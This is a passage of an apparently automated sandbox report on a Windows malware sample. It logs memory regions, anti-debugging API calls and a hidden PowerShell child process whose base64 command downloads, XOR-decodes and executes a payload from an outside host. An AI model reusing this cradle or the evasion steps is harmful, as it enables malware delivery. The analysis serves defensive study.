= "" Region: id = 823 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 824 start_va = 0x400000 end_va = 0x1c39fff monitored = 1 entry_point = 0xf4fb75 region_type = mapped_file name = "svchost.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\5zjnws5lvhhy2g2\\svchost.exe") Region: id = 825 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 826 start_va = 0x77460000 end_va = 0x775dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 827 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 828 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 829 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 830 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 831 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 832 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 833 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 834 start_va = 0x1a0000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 835 start_va = 0x73bf0000 end_va = 0x73c2efff monitored = 0 entry_point = 0x73c1e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 836 start_va = 0x73b90000 end_va = 0x73bebfff monitored = 0 entry_point = 0x73bcf9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 837 start_va = 0x73b80000 end_va = 0x73b87fff monitored = 0 entry_point = 0x73b820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 838 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 839 start_va = 0x75130000 end_va = 0x7523ffff monitored = 0 entry_point = 0x75143283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 840 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 841 start_va = 0x77160000 end_va = 0x7727efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077160000" filename = "" Region: id = 842 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 843 start_va = 0x77060000 end_va = 0x77159fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077060000" filename = "" Region: id = 844 start_va = 0x280000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 845 start_va = 0x75130000 end_va = 0x7523ffff monitored = 0 entry_point = 0x75143283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 846 start_va = 0x75040000 end_va = 0x75086fff monitored = 0 entry_point = 0x750474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 847 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 848 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 849 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 850 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 851 start_va = 0x1c40000 end_va = 0x1ca6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 852 start_va = 0x75810000 end_va = 0x7590ffff monitored = 0 entry_point = 0x7582b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 853 start_va = 0x75a40000 end_va = 0x75acffff monitored = 0 entry_point = 0x75a56343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 854 start_va = 0x75400000 end_va = 0x75409fff monitored = 0 entry_point = 0x754036a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 855 start_va = 0x76120000 end_va = 0x761bcfff monitored = 0 entry_point = 0x76153fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 856 start_va = 0x75600000 end_va = 0x756abfff monitored = 0 entry_point = 0x7560a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 857 start_va = 0x75910000 end_va = 0x759affff monitored = 0 entry_point = 0x759249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 858 start_va = 0x76e10000 end_va = 0x76e28fff monitored = 0 entry_point = 0x76e14975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 859 start_va = 0x75c60000 end_va = 0x75d4ffff monitored = 0 entry_point = 0x75c70569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 860 start_va = 0x74fb0000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74fca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 861 start_va = 0x74fa0000 end_va = 0x74fabfff monitored = 0 entry_point = 0x74fa10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 862 start_va = 0x756b0000 end_va = 0x7580bfff monitored = 0 entry_point = 0x756fba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 863 start_va = 0x1a0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 864 start_va = 0x200000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 865 start_va = 0x1a0000 end_va = 0x1bdfff monitored = 0 entry_point = 0x1b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 866 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 867 start_va = 0x1cb0000 end_va = 0x1e37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cb0000" filename = "" Region: id = 868 start_va = 0x1a0000 end_va = 0x1bdfff monitored = 0 entry_point = 0x1b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 869 start_va = 0x755a0000 end_va = 0x755fffff monitored = 0 entry_point = 0x755b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 870 start_va = 0x75240000 end_va = 0x7530bfff monitored = 0 entry_point = 0x7524168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 871 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 872 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 873 start_va = 0x1e40000 end_va = 0x1fc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 874 start_va = 0x1fd0000 end_va = 0x33cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fd0000" filename = "" Region: id = 875 start_va = 0x33d0000 end_va = 0x4152fff monitored = 1 entry_point = 0x3f1fb75 region_type = mapped_file name = "svchost.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\5zjnws5lvhhy2g2\\svchost.exe") Thread: id = 66 os_tid = 0xf80 [0070.523] LocalAlloc (uFlags=0x0, uBytes=0xc8) returned 0x2f2c20 [0070.528] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75130000 [0070.537] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77460000 [0070.555] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1a, ProcessInformation=0x18fd00, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18fd00, ReturnLength=0x0) returned 0x0 [0070.557] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18f748, ProcessInformationLength=0x8, ReturnLength=0x0 | out: ProcessInformation=0x18f748, ReturnLength=0x0) returned 0x0 [0070.558] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18f748, ProcessInformationLength=0x8, ReturnLength=0x18fedc | out: ProcessInformation=0x18f748, ReturnLength=0x18fedc) returned 0xc0000353 [0070.559] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18f748, ProcessInformationLength=0x8, ReturnLength=0x1 | out: ProcessInformation=0x18f748, ReturnLength=0x1) returned 0xc0000005 [0070.560] NtSetInformationThread (ThreadHandle=0xfffffffffffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0070.561] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x18fe70, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x18fe70, ResultLength=0x0) returned 0x0 [0070.561] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x18fe8c, Length=0x0, ResultLength=0x18fe7c | out: SystemInformation=0x18fe8c, ResultLength=0x18fe7c*=0xbff0) returned 0xc0000004 [0070.562] LocalAlloc (uFlags=0x0, uBytes=0x17fe0) returned 0x2f2cf0 [0070.563] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x2f2cf0, Length=0x17fe0, ResultLength=0x0 | out: SystemInformation=0x2f2cf0, ResultLength=0x0) returned 0x0 [0070.724] LocalFree (hMem=0x2f2cf0) returned 0x0 [0071.504] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x18f998, nSize=0xfe | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\5zjnws5lvhhy2g2\\svchost.exe")) returned 0x40 [0071.505] NtOpenFile (in: FileHandle=0x18f744, DesiredAccess=0x80100080, ObjectAttributes=0x18f700*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe", Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x18f734, ShareAccess=0x3, OpenOptions=0x60 | out: FileHandle=0x18f744*=0x7c, IoStatusBlock=0x18f734*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0071.506] NtCreateSection (in: SectionHandle=0x18f740, DesiredAccess=0x4, ObjectAttributes=0x18f710*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x8000000, FileHandle=0x7c | out: SectionHandle=0x18f740*=0x80) returned 0x0 [0071.507] NtMapViewOfSection (in: SectionHandle=0x80, ProcessHandle=0xffffffffffffffff, BaseAddress=0x18f734*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18f72c*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x18f734*=0x33d0000, SectionOffset=0x0, ViewSize=0x18f72c*=0xd83000) returned 0x0 [0071.859] LocalAlloc (uFlags=0x0, uBytes=0x3e6c) returned 0x2f2cf0 [0074.082] LocalFree (hMem=0x2f2cf0) returned 0x0 [0074.083] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x75130000 [0074.084] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x75810000 [0074.084] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0xc, ProcessInformation=0x18fea8, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18fea8, ReturnLength=0x0) returned 0x0 [0074.084] ExitProcess (uExitCode=0xdeadc0de) Process: id = "4" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x3d364000" os_pid = "0xf88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf40" cmd_line = "powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAHQAYwBoAGsALQAxAC4AYwBvAG0ALwBkAHIAbwBwADIALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAEEAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBXACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAeAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHkAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB6ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADIANQA1ACkAIAAtAGIAeABvAHIAIAAxADEAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f3d7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 876 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 877 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 878 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 879 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 880 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 881 start_va = 0xb0000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 882 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 883 start_va = 0x320000 end_va = 0x38afff monitored = 0 entry_point = 0x32d330 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 884 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 885 start_va = 0x77460000 end_va = 0x775dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 886 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 887 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 888 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 889 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 890 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 891 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 892 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 893 start_va = 0x390000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 894 start_va = 0x73bf0000 end_va = 0x73c2efff monitored = 0 entry_point = 0x73c1e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 895 start_va = 0x73b90000 end_va = 0x73bebfff monitored = 0 entry_point = 0x73bcf9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 896 start_va = 0x73b80000 end_va = 0x73b87fff monitored = 0 entry_point = 0x73b820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 897 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 898 start_va = 0x75130000 end_va = 0x7523ffff monitored = 0 entry_point = 0x75143283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 899 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 900 start_va = 0x77160000 end_va = 0x7727efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077160000" filename = "" Region: id = 901 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 902 start_va = 0x77060000 end_va = 0x77159fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077060000" filename = "" Region: id = 903 start_va = 0x4f0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 904 start_va = 0x75130000 end_va = 0x7523ffff monitored = 0 entry_point = 0x75143283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 905 start_va = 0x75040000 end_va = 0x75086fff monitored = 0 entry_point = 0x750474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 906 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 907 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 908 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 909 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 910 start_va = 0xf0000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 911 start_va = 0x75910000 end_va = 0x759affff monitored = 0 entry_point = 0x759249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 912 start_va = 0x75600000 end_va = 0x756abfff monitored = 0 entry_point = 0x7560a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 913 start_va = 0x76e10000 end_va = 0x76e28fff monitored = 0 entry_point = 0x76e14975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 914 start_va = 0x75c60000 end_va = 0x75d4ffff monitored = 0 entry_point = 0x75c70569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 915 start_va = 0x74fb0000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74fca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 916 start_va = 0x74fa0000 end_va = 0x74fabfff monitored = 0 entry_point = 0x74fa10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 917 start_va = 0x74e80000 end_va = 0x74e93fff monitored = 0 entry_point = 0x74e81da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 918 start_va = 0x75810000 end_va = 0x7590ffff monitored = 0 entry_point = 0x7582b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 919 start_va = 0x75a40000 end_va = 0x75acffff monitored = 0 entry_point = 0x75a56343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 920 start_va = 0x75400000 end_va = 0x75409fff monitored = 0 entry_point = 0x754036a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 921 start_va = 0x76120000 end_va = 0x761bcfff monitored = 0 entry_point = 0x76153fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 922 start_va = 0x756b0000 end_va = 0x7580bfff monitored = 0 entry_point = 0x756fba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 923 start_va = 0x76030000 end_va = 0x760befff monitored = 0 entry_point = 0x76033fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 924 start_va = 0x73a60000 end_va = 0x73aa9fff monitored = 1 entry_point = 0x73a62e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 925 start_va = 0x1d0000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 926 start_va = 0x70000 end_va = 0x8dfff monitored = 0 entry_point = 0x8158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 927 start_va = 0x6d0000 end_va = 0x857fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 928 start_va = 0x70000 end_va = 0x8dfff monitored = 0 entry_point = 0x8158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 929 start_va = 0x755a0000 end_va = 0x755fffff monitored = 0 entry_point = 0x755b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 930 start_va = 0x75240000 end_va = 0x7530bfff monitored = 0 entry_point = 0x7524168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 931 start_va = 0x860000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 